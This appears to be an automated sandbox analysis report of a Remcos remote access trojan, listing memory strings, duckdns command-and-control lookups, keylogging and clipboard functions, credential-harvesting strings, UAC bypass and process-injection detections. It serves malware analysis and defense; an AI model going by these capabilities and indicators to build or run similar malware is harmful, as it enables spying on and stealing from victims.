Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: baddieszn.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: bahadii.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp)
Source: SndVol.exe, 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000002.2295912725.00000000031AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpP
Source: colorcpl.exe, 00000023.00000002.2293950327.0000000003187000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/son.gp
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: recover.exe, recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.coma
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 0000002F.00000002.2133255398.00000000005F4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1881559620.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.00000000208AA000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E8DE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?6cc2fc022d35de4436d46235
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?97ae33b93885af7139d3f9b0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?6aff50c04f9af0461603c0c1
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?e4d500512ddeced1b68e7640
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?67e56b9b06a4d427a359554f
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?b4ef4344b8bbbc91cc6b3006
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?2b5ac21b953982869b52cfd6
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?b53a91fd779d41798d7818ff
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAXr4b&Fr
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?2b2f77512f7c65b2f52ee30ffe87d61a
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?355cac43462bdbbb118c6145bdcc88c0
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?42704eed386765f870e05e14b5b322b7
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?b21ec88677686eb844798ccd641c5fe5
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?086008d5de6d8b19567a45da7804f652
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?79007fa287900ed2975a809f346f1f62
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: recover.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json?One
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=b12f1ec5da72bf506d52
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=e0a3ca
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2bedfa25f63b1e1b9bd24eb0a5625631
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?f60497627d681e8f4d8561fad4b92959
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: recover.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv3B03.tmp.47.dr	String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000

62_2_00409D1E

Source: C:\Windows\SysWOW64\recover.exe

Code function: 47_2_0041138D OpenClipboard,GetLastError,DeleteFileW,

47_2_0041138D

Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	47_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	47_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	49_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	49_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	53_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	53_2_004072B5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	62_2_0041696E

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

62_2_0040B158

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

62_2_00409E4A

Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ANYDESK.PIF PID: 1944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041CF2D SystemParametersInfoW,		62_2_0041CF2D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684DDBB SystemParametersInfoW,		62_2_0684DDBB

System Summary

Malicious sample detected (through community Yara rule)

Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B13380 NtWriteVirtualMemory,	26_2_02B13380
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B13034 NtAllocateVirtualMemory,	26_2_02B13034
